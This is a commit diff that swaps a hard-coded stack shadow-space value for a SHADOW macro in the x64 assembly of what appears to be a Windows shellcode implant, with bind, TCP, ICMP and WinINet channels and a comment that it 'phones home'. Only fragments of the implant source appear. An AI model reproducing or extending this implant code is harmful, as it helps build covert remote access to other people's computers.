Code clarity with the SHADOW define, added ruby-dev to Dockerfile

Dockerfile

@@ -6,7 +6,7 @@ WORKDIR /
 
 RUN apt-get update
 RUN apt-get install --no-install-recommends -y mingw-w64 
-RUN apt-get install --no-install-recommends -y ruby ruby-sinatra ruby-sinatra-contrib thin pry
+RUN apt-get install --no-install-recommends -y ruby ruby-dev ruby-sinatra ruby-sinatra-contrib thin pry
 RUN apt-get install --no-install-recommends -y git bsdmainutils procps screen tmux
 RUN apt-get install --no-install-recommends -y autoconf build-essential nasm curl xz-utils
 

agent/io/bind.asm

@@ -30,7 +30,7 @@ end_def engine
 start_def ASM, initio, "initio"	
 	mov rbp, rsp
 	and rsp, -16 		; align stack
-	sub rsp, 0x20
+	sub rsp, SHADOW
 
 	call .b
 .a:     db "ws2_32.dll", 0
@@ -97,12 +97,12 @@ start_def ASM, initio, "initio"
 
 	;; save the client socket
 	push rax
-	sub rsp, 0x20
+	sub rsp, SHADOW
 
 	;; close bound socket
 	mov rcx, G_SOCK
 	call G_WCLOSESOCKET
-	add rsp, 0x20
+	add rsp, SHADOW
 	pop rax
 	mov G_SOCK, rax
 
@@ -131,7 +131,7 @@ start_def ASM, emit, "emit"
 	xor r8, r8
 	inc r8
 	xor r9, r9
-	sub rsp, 0x20
+	sub rsp, SHADOW
 	call G_WSEND
 	add rsp, 0x28
 	mov rdi, [PSP]
@@ -148,9 +148,9 @@ start_def ASM, key, "key"
 	xor r8, r8
 	inc r8
 	xor r9, r9
-	sub rsp, 0x20
+	sub rsp, SHADOW
 	call G_WRECV
-	add rsp, 0x20
+	add rsp, SHADOW
 	pop rdi
 	and rdi, 0xff
 
@@ -192,9 +192,9 @@ start_def ASM, type, "type"
 	mov rdx, [PSP]
 	mov r8, rdi
 	xor r9, r9
-	sub rsp, 0x20
+	sub rsp, SHADOW
 	call G_WSEND
-	add rsp, 0x20
+	add rsp, SHADOW
 	mov rdi, [PSP+8]
 	add PSP, 16
 	pop rcx

agent/io/icmp.asm

@@ -287,7 +287,7 @@ end_def pingms
 icmp_delay:
 	push rbp		; 
 	mov rbp, rsp		; save stack
-	sub rsp, 0x20		; make shadow space
+	sub rsp, SHADOW		; make shadow space
 	and rsp, -16		; align stack just in case
 
 	mov rcx, G_MODE		; get last response code

agent/io/io.asm

@@ -46,7 +46,7 @@ start_def ASM, emit, "emit"
 	mov r8, 1		; print only one character
 	mov r9, r15		; place to save # bytes written
 	push QWORD 0		; final parameter, no flags
-	sub rsp, 0x20		; shadow space
+	sub rsp, SHADOW		; shadow space
 	call W32_WriteFile	; ...
 	add rsp, 0x30		; fix stack
 	pop rcx
@@ -59,7 +59,7 @@ start_def ASM, key, "key"
 	mov rcx, G_INPUT
 	mov r8, 1
 	mov r9, r15
-	sub rsp, 0x20
+	sub rsp, SHADOW
 	call W32_ReadFile
 	pushthing [rsp+0x28]
 	and rdi, 0xff
@@ -89,7 +89,7 @@ start_def ASM, type, "type"
 	mov r9, r15		; WriteFile reports # bytes written
 	push 0			; keep stack paragraph aligned
 	push 0			; no flags
-	sub rsp, 0x20		; shadow space
+	sub rsp, SHADOW		; shadow space
 	call W32_WriteFile	; ...
 	add rsp, 0x30		; fix stack
 	pop rcx

agent/io/memory.asm

@@ -21,7 +21,7 @@ end_def engine
 
 start_def ASM, initio, "initio"
 	mov rbp, rsp
-	sub rsp, 0x20
+	sub rsp, SHADOW
 	and rsp, -16
 
 	xor ebx, ebx
@@ -52,7 +52,7 @@ end_def initio
 
 start_def ASM, emit, "emit"
 	mov rbp, rsp
-	sub rsp, 0x20
+	sub rsp, SHADOW
 	and rsp, -16
 
 	mov rbx, G_IOBUF	; get pointer to IO buffer
@@ -86,7 +86,7 @@ end_def emit
 
 start_def ASM, key, "key"
 	mov rbp, rsp
-	sub rsp, 0x20
+	sub rsp, SHADOW
 	and rsp, -16
 
 	mov rbx, G_IOBUF

agent/io/net.asm

@@ -33,7 +33,7 @@ end_def engine
 start_def ASM, initio, "initio"	
 	mov rbp, rsp
 	and rsp, -16 		; align stack
-	sub rsp, 0x20
+	sub rsp, SHADOW
 
 	call .b
 .a:     db "ws2_32.dll", 0
@@ -151,7 +151,7 @@ start_def ASM, emit, "emit"
 	xor r8, r8
 	inc r8
 	xor r9, r9
-	sub rsp, 0x20
+	sub rsp, SHADOW
 	call G_WSEND
 	add rsp, 0x28
 	mov rdi, [PSP]
@@ -168,9 +168,9 @@ start_def ASM, key, "key"
 	xor r8, r8
 	inc r8
 	xor r9, r9
-	sub rsp, 0x20
+	sub rsp, SHADOW
 	call G_WRECV
-	add rsp, 0x20
+	add rsp, SHADOW
 	pop rdi
 	and rdi, 0xff
 
@@ -243,9 +243,9 @@ start_def ASM, type, "type"
 	mov rdx, [PSP]
 	mov r8, rdi
 	xor r9, r9
-	sub rsp, 0x20
+	sub rsp, SHADOW
 	call G_WSEND
-	add rsp, 0x20
+	add rsp, SHADOW
 	mov rdi, [PSP+8]
 	add PSP, 16
 	pop rcx

agent/io/wininet.asm

@@ -307,7 +307,7 @@ end_def setecho
 net_delay:
 	push rbp		; 
 	mov rbp, rsp		; save stack
-	sub rsp, 0x20		; make shadow space
+	sub rsp, SHADOW		; make shadow space
 	and rsp, -16		; align stack just in case
 
 	mov rcx, G_RESPONSE	; get last response code

agent/main.asm

@@ -53,7 +53,7 @@ save:   sub rax, save - main	; find entry point for shellcode
 	mov G_RSP0, rsp
 	mov G_PSP0, r12
 
-	sub rsp, 0x20
+	sub rsp, SHADOW
 	mov ecx, -11
 	call W32_GetStdHandle
 	mov G_STDOUT, rax
@@ -88,7 +88,7 @@ save:   sub rax, save - main	; find entry point for shellcode
 	mov r8d, 0x3000		; allocation type
 	mov r9d, 0x40		; protection flags
 	call W32_VirtualAlloc	; ...
-	add rsp, 0x20		; remove shadow space
+	add rsp, SHADOW		; remove shadow space
 
 	mov G_SCRATCH, rax
 	add rax, 0x100
@@ -195,7 +195,7 @@ update:	mov rcx, [rbx]		; get LINK offset
 ;;; Environment is set up, dictionary exists, "main" code follows
 ;;; ------------------------------------------------------------------------
 
-	sub rsp, 0x20
+	sub rsp, SHADOW
 	mov ecx, 0xffff		 ; avoid error reporting
 	call W32_SetErrorMode    ; ...
 
@@ -221,7 +221,7 @@ update:	mov rcx, [rbx]		; get LINK offset
 	xor ecx, ecx
 	;inc ecx
 	call W32_AddVectoredExceptionHandler
-	add rsp, 0x20
+	add rsp, SHADOW
 
 	pushthing code_key - main
 	add rdi, G_ENTRY
@@ -237,7 +237,7 @@ boot:	call code_initio
 	;; phones home don't look the same
 	push rbp
 	mov rbp, rsp
-	sub rsp, 0x20
+	sub rsp, SHADOW
 	and rsp, -16
 	call W32_GetTickCount	; ticks since boot
 	pushthing rax		;